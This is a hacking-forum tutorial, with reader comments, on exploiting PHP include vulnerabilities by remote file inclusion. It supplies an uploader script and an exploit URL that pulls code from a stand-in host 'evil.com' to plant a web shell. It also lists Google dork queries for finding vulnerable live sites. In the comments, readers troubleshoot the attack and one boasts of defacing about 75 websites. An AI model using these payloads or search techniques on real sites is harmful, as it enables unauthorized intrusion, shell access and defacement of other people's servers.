Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Include Exploits


Include Exploits

By ghostghost | 94702 Reads |
0     0

In this article I will teach you the basics of Include Exploits. If you understand php then this will help, although not much.

When a site uses one page to call all the others around a basic template, they can become subject to exploitation under certain circumstances.

e.g. http://www.abc.com/index.php?page=news

To test if its vulnerable, try changing it to abc or whatever

e.g. http://www.abc.com/index.php?page=abc

If its vulnerable you should get an error like this:

Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01

Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.

e.g. $page = $_GET ['page'] . ".php"; include ($page);

So, what we need now is an uploader to allow us to upload files on to there server. Here's some dazzling code written by cheesy himself:

<?php

if ( $userfile ) { @$res=copy($userfile,"$userfile_name"); if ( !$res ){ print "Upload failed! \n"; }else{ print "Upload of $userfile_name successful \n"; } } ?>

<FORM method=POST ENCTYPE="multipart/form-data"> File to Upload <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000"> <INPUT NAME="userfile" TYPE="file" size=35> <INPUT TYPE="submit"> </FORM> </HTML>

So, we need to host this code on a server that doesnt support php or just edit your htaccess so your server treats it as html or whatever. A good, simple free host that doesnt support php and is quick, easy and anonymous is cjb.net

So to exploit the page simply add your url for the uploader script:

e.g. http://www.abc.com/index.php?page=http://evil.com/uploader

Remember if the site adds .php only the page variable be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.

To find vulnerable sites, we can use our best friend, google. Good searches include:

inurl:"index.php?page=downloads" inurl:"index.php?page=news.php"

Be imaginative :)

Thanks for reading and i hope you've learnt something new.

Will.

Comments
ghost's avatar
ghost 18 years ago

nice nice B) i liked it

ghost's avatar
ghost 18 years ago

Good article. I always get "upload failed n" though.

ghost's avatar
ghost 18 years ago

Thats because the index.php file your exploiting doesnt have the permissions i think. Try making a script using fopen instead.

ghost's avatar
ghost 18 years ago

Great article, nicely explained :)

ghost's avatar
ghost 18 years ago

What article did you base this off of? I'm not accusing you of anything, just wondering if you were had read the article I posted to Rohitab and HTS a while back.

ghost's avatar
ghost 18 years ago

awesome article :D

ghost's avatar
ghost 18 years ago

thousandtoone i based it on sheer experience, i havent read your article and apologise if you feel ive copied you. Ive never even heard of 'Rohitab' and have only ever been on HTS once. Was your article similar to mine?

ghost's avatar
ghost 18 years ago

WilleH, figured that was the case. Generally people don't try to reinvent the wheel so I thought you might've read this somewhere in the past. This article I wrote was one of my first major attempts at defacing.. Between this and finding two of my own vulnerabilities in PHP-Nuke, I must've defaced close to 75 websites in one weekend.

http://www.hackthissite.org/articles/read/285/2/30

ghost's avatar
ghost 18 years ago

You talk more about uploads whereas I discuss shell commands and general fopen attacks, but nonethess you can see where I imagined you might've seen my article. Fun stuff and good article!

ghost's avatar
ghost 18 years ago

This is one of the best article i've come accross on this site. Congrats! :)

ghost's avatar
ghost 18 years ago

It sounds like an article on hts but is completly different

ghost's avatar
ghost 18 years ago

there is one problem… most websites use it like this:

<?php $page=$_get['page']; $page_include="include/".$page; include($page_include); ?>

basicly, this means that if you use this exploit it will include include/http://evil.com/uploader.php instead of http://evil.com/uploader.php, so the file won't be found :(

ghost's avatar
ghost 18 years ago

most websites dont.

ghost's avatar
ghost 18 years ago

nice article

ghost's avatar
ghost 18 years ago

@ willeH: example?

ghost's avatar
ghost 18 years ago

Well, I found one. It's not to break down your article, its very good. Just said not much sites used it like that…

ghost's avatar
ghost 18 years ago

Exactly, or else no site would be safe.

ghost's avatar
ghost 18 years ago

And, im not going to give you an example because no doubt it would get around and the server would get raped.

ghost's avatar
ghost 18 years ago

this was def. worth the read!

ghost's avatar
ghost 17 years ago

SkareCrow wrote a similar article, for those who still don't get it:

http://www.hellboundhackers.org/articlecomments.php?article_id=612